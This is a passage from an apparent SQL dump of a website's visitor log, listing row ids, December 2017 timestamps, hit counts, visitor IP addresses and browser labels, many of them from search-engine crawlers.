0,'46.229.168.79','other'),(185496,1512642065,2,2,0,0,'46.229.168.69','other'),(185497,1512642103,7,7,0,0,'46.229.168.68','other'),(185498,1512642119,4,4,0,0,'46.229.168.67','other'),(185499,1512642155,5,5,0,0,'46.229.168.71','other'),(185500,1512642207,3,3,0,0,'46.229.168.76','other'),(185501,1512642356,4,4,0,0,'46.229.168.65','other'),(185502,1512642450,4,4,0,0,'46.229.168.73','other'),(185503,1512642645,4,4,0,0,'46.229.168.78','other'),(185504,1512642755,4,4,0,0,'46.229.168.70','other'),(185505,1512642929,5,5,0,0,'46.229.168.77','other'),(185506,1512643036,3,3,0,0,'46.229.168.67','other'),(185507,1512643040,3,3,0,0,'46.229.168.66','other'),(185508,1512643083,6,6,0,0,'46.229.168.80','other'),(185509,1512643104,4,4,0,0,'46.229.168.79','other'),(185510,1512643139,10,10,0,0,'46.229.168.74','other'),(185511,1512643180,5,5,0,0,'46.229.168.76','other'),(185512,1512643230,11,11,0,0,'46.229.168.69','other'),(185513,1512643329,6,6,0,0,'46.229.168.68','other'),(185514,1512643345,1,1,0,0,'46.174.166.76','firefox'),(185515,1512643498,1,1,0,0,'91.196.178.162','chrome'),(185516,1512643518,4,4,0,0,'46.229.168.73','other'),(185517,1512643566,5,5,0,0,'46.229.168.75','other'),(185518,1512643592,1,1,0,0,'82.207.11.119','chrome'),(185519,1512643636,7,7,0,0,'46.229.168.65','other'),(185520,1512643700,8,8,0,0,'46.229.168.78','other'),(185521,1512643761,7,7,0,0,'46.229.168.71','other'),(185522,1512643782,5,5,0,0,'46.229.168.70','other'),(185523,1512643785,1,1,0,0,'141.8.142.74','other'),(185524,1512644094,4,4,0,0,'46.229.168.67','other'),(185525,1512644125,2,2,0,0,'46.229.168.74','other'),(185526,1512644226,2,2,0,0,'46.229.168.77','other'),(185527,1512644279,5,5,0,0,'46.229.168.80','other'),(185528,1512644318,3,3,0,0,'46.229.168.76','other'),(185529,1512644390,5,5,0,0,'46.229.168.66','other'),(185530,1512644481,3,3,0,0,'46.229.168.79','other'),(185531,1512644499,5,5,0,0,'46.229.168.75','other'),(185532,1512644518,2,2,0,0,'46.229.168.68','other'),(185533,1512644691,3,3,0,0,'46.229.168.73','other'),(185534,1512644726,3,3,0,0,'46.229.168.71','other'),(185535,1512644808,1,1,0,0,'31.43.10.11','chrome'),(185536,1512644875,2,2,0,0,'46.229.168.69','other'),(185537,1512644886,1,0,1,0,'66.249.70.27',''),(185538,1512644912,5,5,0,0,'46.229.168.65','other'),(185539,1512645015,2,2,0,0,'46.229.168.70','other'),(185540,1512645088,2,2,0,0,'91.196.178.71','firefox'),(185541,1512645361,1,1,0,0,'91.196.178.163','chrome'),(185542,1512645798,1,1,0,0,'37.54.22.59','chrome'),(185543,1512646119,1,1,0,0,'5.9.98.178','other'),(185544,1512646522,1,1,0,0,'217.69.133.28','other'),(185545,1512647020,1,1,0,0,'5.9.98.178','other'),(185546,1512647410,1,1,0,0,'93.171.241.65','chrome'),(185547,1512647851,1,1,0,0,'91.196.178.72','firefox'),(185548,1512647922,1,1,0,0,'5.9.98.178','other'),(185549,1512648824,1,1,0,0,'5.9.98.178','other'),(185550,1512649726,1,1,0,0,'5.9.98.178','other'),(185551,1512650291,1,1,0,0,'46.174.163.134','chrome'),(185552,1512650856,5,5,0,0,'91.196.178.163','chrome'),(185553,1512651268,1,1,0,0,'46.174.163.134','chrome'),(185554,1512652163,1,1,0,0,'8.29.198.26','other'),(185555,1512653178,1,1,0,0,'91.196.178.130','chrome'),(185556,1512653546,1,1,0,0,'37.73.193.80','msie'),(185557,1512653690,1,1,0,0,'157.55.39.60','other'),(185558,1512653845,1,1,0,0,'91.196.178.67','chrome'),(185559,1512654200,1,1,0,0,'46.201.49.249','chrome'),(185560,1512654861,1,1,0,0,'66.249.64.28','chrome'),(185561,1512654870,1,1,0,0,'66.249.70.29','chrome'),(185562,1512655031,1,1,0,0,'91.196.178.67','chrome'),(185563,1512655225,1,1,0,0,'54.90.92.204','other'),(185564,1512655330,1,1,0,0,'91.196.178.167','chrome'),(185565,1512655799,1,1,0,0,'46.201.252.235','chrome'),(185566,1512655957,1,0,1,0,'66.249.64.29',''),(185567,1512656427,2,2,0,0,'91.196.178.102','firefox'),(185568,1512657646,1,0,1,0,'66.249.64.29',''),(185569,1512657914,1,1,0,0,'91.196.178.71','firefox'),(185570,1512658086,1,1,0,0,'207.46.13.143','other'),(185571,1512658189,1,1,0,0,'91.196.178.71','chrome'),(185572,1512658665,1,1,0,0,'178.54.164.112','chrome'),(185573,1512659309,1,1,0,0,'180.76.15.17','other'),(185574,1512659750,3,3,0,0,'144.76.8.66','other'),(185575,1512660512,1,1,0,0,'37.52.17.192','chrome'),(185576,1512661501,1,1,0,0,'46.200.86.6','chrome'),(185577,1512661885,1,1,0,0,'92.113.175.25','chrome'),(185578,1512662129,1,1,0,0,'94.179.22.3','chrome'),(185579,1512662507,1,0,1,0,'66.249.70.29',''),(185580,1512662999,1,1,0,0,'8.29.198.26','other'),(185581,1512663146,1,1,0,0,'91.196.179.138','firefox'),(185582,1512663614,1,1,0,0,'46.211.144.182','chrome'),(185583,1512664914,1,1,0,0,'107.167.105.141','other'),(185584,1512665897,1,1,0,0,'217.69.133.247','other'),(185585,1512667045,1,1,0,0,'207.46.13.141','other'),(185586,1512667930,1,1,0,0,'37.73.213.94','chrome'),(185587,1512668113,25,25,0,0,'195.154.168.214','chrome'),(185588,1512668382,1,1,0,0,'91.209.11.236','other'),(185589,1512668597,1,1,0,0,'162.210.196.130','other'),(185590,1512669120,1,1,0,0,'93.77.80.138','chrome'),(185591,1512670678,1,0,1,0,'66.249.66.16',''),(185592,1512671385,1,1,0,0,'178.121.213.163','firefox'),(185593,1512673530,1,1,0,0,'207.46.13.141','other'),(185594,1512673831,1,1,0,0,'91.196.178.168','chrome'),(185595,1512673834,1,1,0,0,'8.29.198.26','other'),(185596,1512674446,1,1,0,0,'141.8.142.74','other'),(185597,1512675014,4,4,0,0,'176.31.101.111','other'),(185598,1512676088,1,1,0,0,'37.9.113.182','other'),(185599,1512676184,1,0,1,0,'66.249.66.18',''),(185600,1512676208,1,1,0,0,'95.132.22.35','firefox'),(185601,1512677222,1,0,1,0,'68.180.229.52',''),(185602,1512677504,1,1,0,0,'141.8.142.74','other'),(185603,1512678777,1,1,0,0,'46.48.13.161','chrome'),(185604,1512678789,1,1,0,0,'95.158.48.83','other'),(185605,1512679859,1,1,0,0,'87.250.224.46','other'),(185606,1512680200,1,1,0,0,'91.196.178.132','firefox'),(185607,1512681009,1,1,0,0,'141.8.142.74','other'),(185608,1512681178,1,0,1,0,'66.249.66.219',''),(185609,1512681374,1,1,0,0,'178.154.171.88','other'),(185610,1512681950,1,1,0,0,'188.163.16.6','chrome'),(185611,1512682685,1,1,0,0,'37.9.113.132','other'),(185612,1512683840,25,25,0,0,'172.245.68.152','chrome'),(185613,1512684029,2,2,0,0,'178.154.171.88','other'),(185614,1512684386,1,1,0,0,'40.77.167.77','other'),(185615,1512684514,1,1,0,0,'37.147.103.147','msie'),(185616,1512684665,1,1,0,0,'8.29.198.27','other'),(185617,1512684763,1,1,0,0,'141.8.142.74','other'),(185618,1512686808,1,1,0,0,'136.243.70.68','chrome'),(185619,1512687547,1,1,0,0,'141.8.142.74','other'),(185620,1512687958,1,1,0,0,'87.250.224.46','other'),(185621,1512688267,1,1,0,0,'157.55.39.60','other'),(185622,1512688422,1,1,0,0,'178.154.171.88','other'),(185623,1512690756,1,1,0,0,'178.154.171.88','other'),(185624,1512690817,1,0,1,0,'66.249.66.199',''),(185625,1512691898,1,1,0,0,'178.154.171.88','other'),(185626,1512692743,1,1,0,0,'207.46.13.143','other'),(185627,1512693930,1,1,0,0,'46.188.29.95','other'),(185628,1512695138,1,1,0,0,'141.8.142.74','other'),(185629,1512695492,1,1,0,0,'8.29.198.25','other'),(185630,1512696133,1,1,0,0,'141.8.142.74','other'),(185631,1512696778,1,1,0,0,'91.209.11.236','other'),(185632,1512697634,1,1,0,0,'207.46.13.143','other'),(185633,1512698118,1,1,0,0,'217.69.133.84','other'),(185634,1512698452,1,1,0,0,'91.209.11.236','other'),(185635,1512699162,1,1,0,0,'141.8.142.74','other'),(185636,1512701296,1,1,0,0,'178.154.171.88','other'),(185637,1512701708,2,2,0,0,'141.8.142.74','other'),(185638,1512702789,1,1,0,0,'178.154.171.88','other'),(185639,1512704388,1,0,1,0,'66.249.66.18',''),(185640,1512706325,1,1,0,0,'8.29.198.26','other'),(185641,1512708068,3,3,0,0,'141.8.142.74','other'),(185642,1512708916,1,1,0,0,'91.209.11.236','other'),(185643,1512709880,1,1,0,0,'91.209.11.236','other'),(185644,1512711541,1,1,0,0,'141.8.142.74','other'),(185645,1512712476,1,1,0,0,'141.8.142.74','other'),(185646,1512713114,1,0,1,0,'68.180.229.104',''),(185647,1512714613,1,1,0,0,'130.180.219.135','chrome'),(185648,1512714895,2,2,0,0,'141.8.142.74','other'),(185649,1512715607,1,1,0,0,'176.113.170.104','chrome'),(185650,1512715726,1,1,0,0,'91.196.178.67','chrome'),(185651,1512716842,1,1,0,0,'91.196.178.65','chrome'),(185652,1512716979,1,1,0,0,'91.196.177.46','chrome'),(185653,1512717158,1,1,0,0,'8.29.198.27','other'),(185654,1512717356,1,1,0,0,'91.196.178.68','chrome'),(185655,1512717440,1,1,0,0,'141.8.142.74','other'),(185656,1512718642,1,1,0,0,'91.196.178.67','chrome'),(185657,1512719348,1,1,0,0,'178.54.190.249','chrome'),(185658,1512719570,1,1,0,0,'178.154.171.88','other'),(185659,1512719959,1,0,1,0,'66.249.66.18',''),(185660,1512720169,1,1,0,0,'204.79.180.9','msie'),(185661,1512721396,1,1,0,0,'88.99.19.242','other'),(185662,1512721497,1,1,0,0,'46.201.240.112','chrome'),(185663,1512721533,2,2,0,0,'178.154.171.88','other'),(185664,1512721831,1,1,0,0,'83.217.214.72','msie'),(185665,1512721832,1,1,0,0,'46.188.90.51','msie'),(185666,1512722486,5,5,0,0,'5.9.62.130','other'),(185667,1512722799,2,2,0,0,'141.8.142.74','other'),(185668,1512722999,1,1,0,0,'92.112.205.232','opera'),(185669,1512723337,1,1,0,0,'91.196.178.67','chrome'),(185670,1512724482,1,1,0,0,'46.164.139.38','chrome'),(185671,1512724735,1,1,0,0,'188.166.72.95','chrome'),(185672,1512725043,1,0,1,0,'66.249.66.18',''),(185673,1512725794,1,1,0,0,'87.250.224.46','other'),(185674,1512725839,1,1,0,0,'176.193.115.106','msie'),(185675,1512725840,1,1,0,0,'128.68.18.162','msie'),(185676,1512725841,1,1,0,0,'95.221.51.193','msie'),(185677,1512725842,1,1,0,0,'95.220.106.111','msie'),(185678,1512725843,1,1,0,0,'79.111.95.64','msie'),(185680,1512726805,1,1,0,0,'193.34.94.57','chrome'),(185681,1512726920,2,1,1,0,'66.249.66.20',''),(185682,1512727559,2,2,0,0,'207.46.13.141','other'),(185683,1512727625,1,1,0,0,'141.8.142.74','other'),(185684,1512727887,1,1,0,0,'178.154.171.88','other'),(185685,1512727985,1,1,0,0,'8.29.198.26','other'),(185686,1512728150,1,1,0,0,'91.196.178.68','chrome'),(185687,1512729069,1,1,0,0,'141.8.142.74','other'),(185688,1512729791,2,2,0,0,'178.154.171.88','other'),(185689,1512730010,2,2,0,0,'141.8.142.74','other'),(185690,1512730086,1,1,0,0,'91.209.11.236','other'),(185691,1512730261,1,1,0,0,'46.161.9.39','msie'),(185692,1512730610,1,0,1,0,'66.249.66.20',''),(185693,1512731077,1,0,1,0,'66.249.66.18',''),(185694,1512731155,1,1,0,0,'66.249.66.217','chrome'),(185695,1512731160,1,1,0,0,'66.249.66.16','chrome'),(185696,1512731252,1,1,0,0,'91.196.178.68','chrome'),(185697,1512732906,1,1,0,0,'178.54.190.249','chrome'),(185698,1512735362,1,1,0,0,'91.196.178.65','chrome'),(185699,1512735591,1,1,0,0,'37.52.23.196','firefox'),(185700,1512736434,1,0,1,0,'66.249.66.219',''),(185701,1512736841,1,1,0,0,'37.52.23.196','firefox'),(185702,1512738048,1,1,0,0,'37.52.17.192','chrome'),(185703,1512738316,1,1,0,0,'95.133.61.20','chrome'),(185704,1512738362,1,1,0,0,'91.209.11.236','other'),(185705,1512738746,2,2,0,0,'91.196.178.68','chrome'),(185706,1512738816,1,1,0,0,'8.29.198.25','other'),(185707,1512738999,1,1,0,0,'92.113.94.129','chrome'),(185708,1512739352,1,1,0,0,'85.21.233.180','other'),(185709,1512739453,1,1,0,0,'204.79.180.4','msie'),(185710,1512739899,1,1,0,0,'91.196.177.46','chrome'),(185711,1512740117,1,1,0,0,'91.196.178.68','firefox'),(185712,1512740793,1,1,0,0,'91.196.179.33','firefox'),(185713,1512740852,1,1,0,0,'199.30.25.182','other'),(185714,1512740899,1,1,0,0,'91.209.11.236','other'),(185715,1512741178,1,1,0,0,'188.166.72.137','chrome'),(185716,1512741721,1,1,0,0,'91.196.177.46','firefox'),(185717,1512742753,2,2,0,0,'91.209.11.236','other'),(185718,1512743401,1,1,0,0,'178.121.209.21','firefox'),(185719,1512744823,1,1,0,0,'91.209.11.236','other'),(185720,1512745231,1,1,0,0,'91.196.176.13','other'),(185721,1512746421,1,1,0,0,'217.69.136.206','other'),(185722,1512746566,1,0,1,0,'66.249.66.20',''),(185723,1512747259,1,0,1,0,'66.249.66.18',''),(185724,1512747801,1,1,0,0,'217.69.133.228','other'),(185725,1512748151,1,1,0,0,'91.209.11.236','other'),(185726,1512749348,1,1,0,0,'91.209.11.236','other'),(185727,1512749652,1,1,0,0,'8.29.198.27','other'),(185728,1512750086,1,1,0,0,'144.76.38.73','other'),(185729,1512750261,1,1,0,0,'91.209.11.236','other'),(185730,1512750366,1,1,0,0,'207.46.13.100','other'),(185731,1512751399,1,1,0,0,'37.55.57.49','chrome'),(185732,1512752551,1,1,0,0,'91.196.178.47','chrome'),(185733,1512752786,1,1,0,0,'91.196.178.161','chrome'),(185734,1512753171,1,1,0,0,'157.55.39.84','other'),(185735,1512753770,1,1,0,0,'95.132.86.188','chrome'),(185736,1512754083,1,1,0,0,'82.145.220.196','chrome'),(185737,1512754937,1,1,0,0,'46.211.148.34','other'),(185738,1512755130,2,2,0,0,'37.55.57.49','chrome'),(185739,1512755171,1,1,0,0,'91.196.178.130','firefox'),(185740,1512755241,1,1,0,0,'31.13.113.16','other'),(185741,1512755248,1,1,0,0,'31.13.114.145','other'),(185742,1512755249,1,1,0,0,'31.13.113.170','other'),(185743,1512755261,1,1,0,0,'173.252.92.245','other'),(185744,1512755324,1,1,0,0,'91.196.178.47','chrome'),(185745,1512755395,1,0,1,0,'66.249.66.20',''),(185746,1512755532,1,1,0,0,'162.210.196.97','other'),(185747,1512755798,1,1,0,0,'91.196.178.130','chrome'),(185748,1512755921,1,1,0,0,'178.92.249.141','chrome'),(185749,1512755976,1,1,0,0,'46.211.2.120','chrome'),(185750,1512756223,1,1,0,0,'46.133.61.229','chrome'),(185751,1512756233,1,1,0,0,'94.179.208.154','chrome'),(185752,1512756602,1,1,0,0,'91.196.178.132','chrome'),(185753,1512757276,1,1,0,0,'37.73.244.158','chrome'),(185754,1512757587,1,1,0,0,'91.196.178.68','firefox'),(185755,1512758526,1,1,0,0,'157.55.39.84','other'),(185756,1512759587,1,1,0,0,'95.28.187.182','msie'),(185757,1512760063,1,1,0,0,'46.161.9.39','chrome'),(185758,1512760492,1,1,0,0,'8.29.198.26','other'),(185759,1512760998,1,1,0,0,'91.196.178.100','chrome'),(185760,1512761370,1,1,0,0,'91.196.178.165','chrome'),(185761,1512761980,1,1,0,0,'91.209.11.236','other'),(185762,1512762016,2,2,0,0,'37.55.57.49','chrome'),(185763,1512762106,1,1,0,0,'37.73.194.129','chrome'),(185764,1512762672,1,1,0,0,'141.8.142.74','other'),(185765,1512763107,1,1,0,0,'217.69.133.232','other'),(185766,1512763711,2,2,0,0,'91.196.178.165','chrome'),(185767,1512764106,1,1,0,0,'91.209.11.236','other'),(185768,1512764634,1,1,0,0,'95.132.1.75','chrome'),(185769,1512765910,1,1,0,0,'88.253.217.241','firefox'),(185770,1512765992,1,1,0,0,'91.196.178.98','chrome'),(185771,1512766138,1,1,0,0,'141.8.142.74','other'),(185772,1512766471,2,2,0,0,'178.154.171.88','other'),(185773,1512766630,1,1,0,0,'217.69.133.13','other'),(185774,1512768297,1,1,0,0,'87.250.224.46','other'),(185775,1512768339,1,1,0,0,'130.180.211.118','chrome'),(185776,1512768769,1,1,0,0,'91.209.11.236','other'),(185777,1512771267,1,1,0,0,'141.8.142.74','other'),(185778,1512771321,1,1,0,0,'8.29.198.26','other'),(185779,1512771848,1,0,1,0,'68.180.229.52',''),(185780,1512773744,1,1,0,0,'95.164.1.198','other'),(185781,1512773889,1,0,1,0,'66.249.70.25',''),(185782,1512774159,1,1,0,0,'178.154.171.88','other'),(185783,1512775280,1,1,0,0,'178.154.171.81','other'),(185784,1512775836,1,0,1,0,'66.249.64.29',''),(185785,1512777821,1,1,0,0,'91.209.11.236','other'),(185786,1512777828,1,1,0,0,'37.9.113.182','other'),(185787,1512777831,1,1,0,0,'141.8.142.74','other'),(185788,1512778658,1,1,0,0,'185.220.101.12','firefox'),(185789,1512781536,1,1,0,0,'91.209.11.236','other'),(185790,1512782141,1,1,0,0,'8.29.198.26','other'),(185791,1512782538,1,1,0,0,'157.55.39.84','other'),(185792,1512782882,2,2,0,0,'198.204.225.202','msie'),(185793,1512784700,1,1,0,0,'109.63.211.255','msie'),(185794,1512784708,1,1,0,0,'157.55.39.84','other'),(185795,1512784792,1,0,1,0,'66.249.70.27',''),(185796,1512785985,1,1,0,0,'157.55.39.84','other'),(185797,1512787024,1,1,0,0,'91.209.11.236','other'),(185798,1512787580,1,1,0,0,'178.154.171.88','other'),(185799,1512788527,1,1,0,0,'66.249.64.28','chrome'),(185800,1512789170,1,1,0,0,'157.55.39.126','other'),(185801,1512790078,1,1,0,0,'178.154.171.88','other'),(185802,1512790443,1,0,1,0,'66.249.70.29',''),(185803,1512790603,1,1,0,0,'37.190.163.241','chrome'),(185804,1512790834,1,1,0,0,'31.13.106.123','other'),(185805,1512790897,1,1,0,0,'31.13.114.148','other'),(185806,1512792966,1,1,0,0,'8.29.198.25','other'),(185807,1512793051,1,1,0,0,'94.178.104.8','chrome'),(185808,1512793623,1,1,0,0,'178.154.171.88','other'),(185809,1512794820,2,0,2,0,'66.249.64.28',''),(185810,1512795068,1,1,0,0,'37.55.57.49','chrome'),(185811,1512796034,1,1,0,0,'207.46.13.100','other'),(185812,1512796291,1,1,0,0,'157.55.39.172','other'),(185813,1512797232,1,1,0,0,'54.165.59.7','other'),(185814,1512798030,1,1,0,0,'91.196.178.129','firefox'),(185815,1512798142,1,1,0,0,'107.167.108.24','other'),(185816,1512798882,1,1,0,0,'54.165.59.7','other'),(185817,1512799384,1,1,0,0,'37.55.57.49','chrome'),(185818,1512800975,1,1,0,0,'141.8.142.74','other'),(185819,1512801739,118,118,0,0,'93.209.1.44','other'),(185820,1512801968,1,1,0,0,'157.55.39.172','other'),(185821,1512802365,1,1,0,0,'95.132.133.10','chrome'),(185822,1512803179,1,1,0,0,'194.44.70.123','chrome'),(185823,1512803622,1,1,0,0,'54.165.59.7','other'),(185824,1512803736,1,1,0,0,'91.196.178.41','other'),(185825,1512803793,1,1,0,0,'8.29.198.25','other'),(185826,1512805150,1,1,0,0,'37.55.57.49','chrome'),(185827,1512805238,1,1,0,0,'46.211.97.54','other'),(185828,1512807128,1,1,0,0,'207.46.13.100','other'),(185829,1512808045,1,1,0,0,'157.55.39.93','other'),(185830,1512808863,2,2,0,0,'144.76.29.66','other'),(185831,1512811891,1,1,0,0,'157.55.39.172','other'),(185832,1512813897,1,1,0,0,'37.55.57.49','chrome'),(185833,1512814355,25,25,0,0,'142.4.200.37','other'),(185834,1512814625,1,1,0,0,'8.29.198.27','other'),(185835,1512815675,1,1,0,0,'194.79.22.142','chrome'),(185836,1512816759,1,1,0,0,'95.132.8.126','firefox'),(185837,1512817163,1,0,1,0,'66.249.64.29',''),(185838,1512817745,1,1,0,0,'178.154.171.88','other'),(185839,1512818719,1,1,0,0,'217.69.133.5','other'),(185840,1512819020,1,1,0,0,'217.69.134.174','other'),(185841,1512819359,1,1,0,0,'217.69.134.188','other'),(185842,1512819366,1,1,0,0,'91.196.178.168','chrome'),(185843,1512819492,1,1,0,0,'46.211.121.173','chrome'),(185844,1512819576,2,2,0,0,'217.69.134.185','other'),(185845,1512820420,1,1,0,0,'217.69.136.209','other'),(185846,1512820546,1,1,0,0,'46.188.22.179','msie'),(185847,1512820548,1,1,0,0,'46.242.114.174','msie'),(185848,1512820597,2,2,0,0,'40.77.167.156','other'),(185849,1512821075,1,0,1,0,'66.249.64.30',''),(185850,1512821249,1,0,1,0,'66.249.64.29',''),(185851,1512823195,1,1,0,0,'13.56.229.65','chrome'),(185852,1512823985,1,1,0,0,'178.216.0.168','chrome'),(185853,1512825461,1,1,0,0,'8.29.198.27','other'),(185854,1512825978,1,1,0,0,'5.165.178.189','msie'),(185855,1512826968,1,1,0,0,'178.140.117.248','msie'),(185856,1512827447,1,1,0,0,'180.76.15.149','other'),(185857,1512830895,1,1,0,0,'217.69.134.160','other'),(185858,1512831013,1,1,0,0,'91.209.11.236','other'),(185859,1512831097,1,1,0,0,'217.69.134.154','other'),(185860,1512831189,1,1,0,0,'95.28.182.226','other'),(185861,1512831337,1,1,0,0,'95.134.203.8','other'),(185862,1512831686,1,1,0,0,'157.55.39.250','other'),(185863,1512831726,1,1,0,0,'157.55.39.172','other'),(185864,1512832062,1,0,1,0,'68.180.229.52',''),(185865,1512836302,1,1,0,0,'8.29.198.25','other'),(185866,1512836642,1,1,0,0,'128.69.227.49','msie'),(185867,1512836675,2,2,0,0,'91.196.178.163','chrome'),(185868,1512837663,1,1,0,0,'91.196.178.163','chrome'),(185869,1512837789,1,1,0,0,'91.196.178.68','firefox'),(185870,1512838237,1,0,1,0,'66.249.64.30',''),(185871,1512840270,6,6,0,0,'5.9.62.130','other'),(185872,1512842876,1,1,0,0,'178.159.37.31','chrome'),(185873,1512844427,1,1,0,0,'66.249.70.29','chrome'),(185874,1512844876,1,1,0,0,'5.39.49.215','firefox'),(185875,1512845001,1,1,0,0,'141.8.142.74','other'),(185876,1512845464,1,1,0,0,'157.55.39.172','other'),(185877,1512846188,1,1,0,0,'37.9.113.182','other'),(185878,1512846491,1,1,0,0,'217.69.133.68','other'),(185879,1512847130,1,1,0,0,'8.29.198.27','other'),(185880,1512847336,1,1,0,0,'91.196.178.67','chrome'),(185881,1512847511,1,1,0,0,'91.196.178.132','chrome'),(185882,1512848339,1,1,0,0,'66.249.64.29','chrome'),(185883,1512848387,1,1,0,0,'66.249.70.29','chrome'),(185884,1512848644,1,1,0,0,'141.8.142.74','other'),(185885,1512848860,1,1,0,0,'178.121.209.21','firefox'),(185886,1512848951,1,1,0,0,'87.250.224.46','other'),(185887,1512850666,1,1,0,0,'141.8.142.74','other'),(185888,1512850904,2,2,0,0,'178.154.171.88','other'),(185889,1512851289,1,0,1,0,'66.249.70.27',''),(185890,1512851577,3,3,0,0,'141.8.142.74','other'),(185891,1512851748,1,1,0,0,'91.196.178.166','chrome'),(185892,1512852616,1,0,1,0,'66.249.64.30',''),(185893,1512856832,1,1,0,0,'165.227.138.35','other'),(185894,1512857394,1,1,0,0,'217.69.133.230','other'),(185895,1512857475,1,1,0,0,'91.209.11.236','other'),(185896,1512857857,1,1,0,0,'108.59.8.70','other'),(185897,1512857962,1,1,0,0,'8.29.198.27','other'),(185898,1512858278,1,1,0,0,'217.69.133.60','other'),(185899,1512860223,1,1,0,0,'178.67.214.102','chrome'),(185900,1512861057,1,1,0,0,'91.209.11.236','other'),(185901,1512862924,4,4,0,0,'91.121.86.136','other'),(185902,1512863468,1,0,1,0,'66.249.64.30',''),(185903,1512866137,1,1,0,0,'141.8.142.74','other'),(185904,1512868621,1,1,0,0,'141.8.142.74','other'),(185905,1512868793,1,1,0,0,'8.29.198.26','other'),(185906,1512872480,1,1,0,0,'91.209.11.236','other'),(185907,1512872969,1,1,0,0,'37.9.113.100','other'),(185908,1512873279,2,2,0,0,'178.154.171.88','other'),(185909,1512873982,1,1,0,0,'87.250.224.46','other'),(185910,1512874597,1,1,0,0,'54.165.59.7','other'),(185911,1512874698,1,1,0,0,'157.55.39.172','other'),(185912,1512874734,1,0,1,0,'66.249.64.29',''),(185913,1512875248,1,1,0,0,'178.154.171.88','other'),(185914,1512875570,1,1,0,0,'87.250.224.46','other'),(185915,1512877325,1,1,0,0,'178.154.171.55','other'),(185916,1512878610,1,1,0,0,'40.77.167.74','other'),(185917,1512879090,1,1,0,0,'157.55.39.172','other'),(185918,1512879627,1,1,0,0,'8.29.198.25','other'),(185919,1512879807,1,1,0,0,'178.154.171.88','other'),(185920,1512879819,1,1,0,0,'91.209.11.236','other'),(185921,1512880157,1,1,0,0,'5.16.78.242','msie'),(185922,1512880510,1,0,1,0,'66.249.64.28',''),(185923,1512880585,1,1,0,0,'217.69.133.221','other'),(185924,1512880790,1,1,0,0,'91.209.11.236','other'),(185925,1512881698,2,2,0,0,'141.8.142.74','other'),(185926,1512882013,1,1,0,0,'87.250.224.46','other'),(185927,1512882720,1,1,0,0,'141.8.142.74','other'),(185928,1512883828,7,7,0,0,'208.110.93.78','other'),(185929,1512885906,2,2,0,0,'157.55.39.172','other'),(185930,1512886480,1,1,0,0,'178.154.171.88','other'),(185931,1512887561,1,1,0,0,'141.8.142.74','other'),(185932,1512889011,2,2,0,0,'178.154.171.88','other'),(185933,1512889763,1,0,1,0,'66.249.64.30',''),(185934,1512890464,1,1,0,0,'8.29.198.25','other'),(185935,1512890776,1,1,0,0,'31.131.65.243','chrome'),(185936,1512890798,1,1,0,0,'37.55.57.49','chrome'),(185937,1512891577,13,13,0,0,'88.99.19.242','other'),(185938,1512892889,1,1,0,0,'87.250.224.46','other'),(185939,1512894644,1,1,0,0,'178.154.171.88','other'),(185940,1512895937,1,0,1,0,'66.249.64.30',''),(185941,1512896987,1,1,0,0,'178.154.171.88','other'),(185942,1512897177,1,1,0,0,'217.69.133.245','other'),(185943,1512897993,2,2,0,0,'178.154.171.88','other'),(185944,1512899499,1,0,1,0,'66.249.64.30',''),(185945,1512899835,1,1,0,0,'178.154.171.88','other'),(185946,1512899956,1,1,0,0,'46.211.3.130','other'),(185947,1512900415,1,1,0,0,'87.250.224.46','other'),(185948,1512900458,1,1,0,0,'141.8.142.74','other'),(185949,1512901179,1,1,0,0,'66.249.70.27','chrome'),(185950,1512901192,1,1,0,0,'66.249.64.29','chrome'),(185951,1512901306,1,1,0,0,'8.29.198.26','other'),(185952,1512902050,1,0,1,0,'66.249.64.30',''),(185953,1512902381,1,1,0,0,'37.9.113.115','other'),(185954,1512902920,1,1,0,0,'178.154.171.88','other'),(185955,1512903184,1,0,1,0,'66.249.70.25',''),(185956,1512903333,1,1,0,0,'217.69.133.225','other'),(185957,1512904679,1,1,0,0,'178.154.171.88','other'),(185958,1512905546,1,1,0,0,'91.196.178.51','chrome'),(185959,1512905853,1,1,0,0,'141.8.142.74','other'),(185960,1512906397,1,1,0,0,'37.9.113.182','other'),(185961,1512907374,1,1,0,0,'141.8.132.19','other'),(185962,1512907964,1,1,0,0,'217.69.136.205','other'),(185963,1512908424,1,1,0,0,'87.250.224.46','other'),(185964,1512909433,1,0,1,0,'66.249.64.28',''),(185965,1512910017,1,1,0,0,'40.77.167.74','other'),(185966,1512910291,1,1,0,0,'104.131.136.112','chrome'),(185967,1512910395,3,3,0,0,'178.154.200.32','other'),(185968,1512910415,2,2,0,0,'178.154.200.7','other'),(185969,1512910434,1,1,0,0,'178.154.171.81','other'),(185970,1512910456,1,1,0,0,'178.154.171.55','other'),(185971,1512911736,1,1,0,0,'157.55.39.172','other'),(185972,1512912146,1,1,0,0,'8.29.198.26','other'),(185973,1512912838,1,0,1,0,'66.249.70.25',''),(185974,1512913300,1,1,0,0,'141.8.142.74','other'),(185975,1512914358,1,0,1,0,'66.249.70.27',''),(185976,1512917618,1,1,0,0,'217.69.133.217','other'),(185977,1512919559,1,1,0,0,'5.189.160.96','other'),(185978,1512920196,1,1,0,0,'217.69.133.223','other'),(185979,1512920919,1,0,1,0,'66.249.64.28',''),(185980,1512922984,1,1,0,0,'8.29.198.26','other'),(185981,1512923403,1,1,0,0,'173.212.240.226','other'),(185982,1512923867,1,1,0,0,'91.209.11.236','other'),(185983,1512923899,1,0,1,0,'66.249.70.29',''),(185984,1512924049,1,1,0,0,'217.69.133.219','other'),(185985,1512924709,1,1,0,0,'217.69.133.216','other'),(185986,1512926207,1,1,0,0,'217.69.133.218','other'),(185987,1512926232,1,1,0,0,'162.210.196.130','other'),(185988,1512926327,1,0,1,0,'66.249.64.29',''),(185989,1512926996,1,1,0,0,'91.124.180.118','firefox'),(185990,1512927623,1,0,1,0,'66.249.64.28',''),(185991,1512928096,1,1,0,0,'217.69.136.204','other'),(185992,1512928424,1,0,1,0,'68.180.229.52',''),(185993,1512931026,1,1,0,0,'157.55.39.172','other'),(185994,1512932444,1,1,0,0,'92.113.175.25','chrome'),(185995,1512933816,1,1,0,0,'95.10.187.189','other'),(185996,1512933821,1,1,0,0,'8.29.198.26','other'),(185997,1512933962,1,1,0,0,'81.213.188.204','other'),(185998,1512937214,1,0,1,0,'66.249.64.29',''),(185999,1512937281,1,1,0,0,'91.196.178.35','chrome'),(186000,1512937747,1,1,0,0,'157.55.39.172','other'),(186001,1512938564,1,1,0,0,'217.69.133.230','other'),(186002,1512940805,1,1,0,0,'217.69.133.84','other'),(186003,1512941458,1,1,0,0,'91.196.178.166','chrome'),(186004,1512942233,1,1,0,0,'66.249.70.29','chrome'),(186005,